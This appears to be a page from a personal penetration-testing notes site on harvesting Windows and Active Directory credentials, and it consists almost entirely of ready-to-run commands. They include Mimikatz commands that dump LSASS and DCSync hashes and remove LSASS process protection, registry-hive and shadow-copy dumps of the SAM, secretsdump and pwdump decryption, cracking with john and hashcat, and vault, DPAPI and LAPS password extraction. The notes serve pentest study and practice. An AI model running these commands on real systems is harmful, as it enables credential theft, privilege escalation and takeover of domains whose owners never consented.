📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Enumerate Users And Hashes
  • Password To NTLM
  • SAM
  • Dumping
  • Decryption
  • Vault credentials dump
  • DPAPI
  • LAPS
  1. Active Directory

Credentials harvesting

PreviousRubeusNextDomain Controller specific

Last updated 11 months ago

Enumerate Users And Hashes

privilege::debug
token::elevate

lsadump::lsa /inject /name:<user>    //NTLM hash of user
lsadump::dcsync /user:krbtgt         //Hashes of specified user

sekurlsa::logonpasswords //NTLM and SHA1 hashes
sekurlsa::credman        //vault credentials
sekurlsa::ekeys /aes128
sekurlsa::ekeys /aes256

vault::cred    //vault credentials
vault::list    //credman plaintext passwords

if the logonpassword command returns an error Handle on memory (0x00000005) download the library from (Win32) or (Win64) in the same folder as the mimikaz executable and use the following commands in Mimikatz to disable LSASS protection

!+
!processprotect /process:lsass.exe /remove

Password To NTLM

python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'

SAM

Dumping

Manual

Administrative privileges are required to dump register keys

reg.exe save hklm\sam c:\dp\sam.save
reg.exe save hklm\system c:\dp\system.save
reg.exe save hklm\security c:\dp\security.save

Possible backups location

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

ShadowCopy Exploit

It is possible to retrieve and dump keys from old backup versions of the system saved with ShadowCopy. Once the backup version is exposed you can dump the SAM credentials and extract DPAPI hashes. All the following operations require Admin privileges

Enumerate existing copies

vssadmin list shadows

Create a new shadowCopy archive

wmic shadowcopy call create Volume='C:\'

Create a link to the copy

mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\<shadow copy volume name>\

IF you're unable to navigate the link due to access permission errors It is still possible to extract files from the shadow copy

copy \\?\GLOBALROOT\Device\<shadow copy vol>\windows\system32\config\sam <dest>\sam
copy \\?\GLOBALROOT\Device\<shadow copy vol>\windows\system32\config\system <dest>\system

fgdump.exe

Runs locally, creates a file with the hashes.

fgdump.exe
fgdump.exe -t    #test for anti-virus presence
fgdump.exe -a    #don't try to disable anti-virus
fgdump.exe -r    #ignore existing dump files

Mimikatz

lsadump::sam                 //SAM database
lsadump::secrets             //SAM secrets

Decryption

Impacket - secretsdump.py

secretsdump.py -sam <sam file> -system <system file> LOCAL
secretsdump.py -sam <sam file> -system <system file> -security <sec file> LOCAL

Samdump or Pwdump

samdump2 system.save sam.save
pwdump SYSTEM SAM > <file>

After obtaining the hashes they can be cracked to obtain the passwords or used in Pass the Hash attacks. In order to obtain the passwords we need only the NT part of the hash. given an hash with the following structure AAAA:BBBB the actual string to bruteforce is the one to the right of the column

john -format=NT -wordlist=<wordlist> <hashfile>
hashcat -m 1000 -a 0 --force --show --username <hash> <wordlist> #rows follow the format <user>:<hash>

Vault credentials dump

Enumerate credentials manager entries

vaultcmd /list
VaultCmd /listcreds:"<entry name>"

Dump credentials associated with the vault entry

$ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$VaultObj = new-object Windows.Security.Credentials.PasswordVault
$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }

DPAPI

Usual credential files position

%appdata%\Microsoft\Credentials\
%localappdata%\Microsoft\Credentials\
%appdata%\Microsoft\Protect\<usersid>\    //master key

Enumerate Credentials hashes. The parameter guidMasterKey reveals the hash of the master key

dpapi::cred /in:"<path to cred hash>"

Retrieve the master key, decode it and store the key in cache. In order to decrypt the key we need to be operating under the same context (user, system) the key belongs to.

dpapi::masterkey /in:"<Path to MasterKeyGUID>" 
dpapi::masterkey /in:"<Path to MasterKeyGUID>" /rpc
dpapi::cache

Decrypt other hashes with the master key

dpapi::cred /in:"<path to CredHash>"

LAPS

Verify that LAPS is installed by searching for admpwd.dll usually in C:\Program Files\LAPS\CSE

Check available commands in PowerShell

Get-Command *AdmPwd*

Find groups allowed to interact with LAPS. If command run with a wildcard argument throws an exception after returning one or more values call the command again but this time specify as identity parameter one of the OUs obtained the first time

Find-AdmPwdExtendedRights -Identity *
Find-AdmPwdExtendedRights -Identity <OU>

Get users of the detected group

net groups "<group>"

Run the following command in the context of a user part of the group allowed to interact with LAPS to dump the stored passwords. The target is the machine with LAPS enabled

Get-AdmPwdPassword -ComputerName <target>
here
here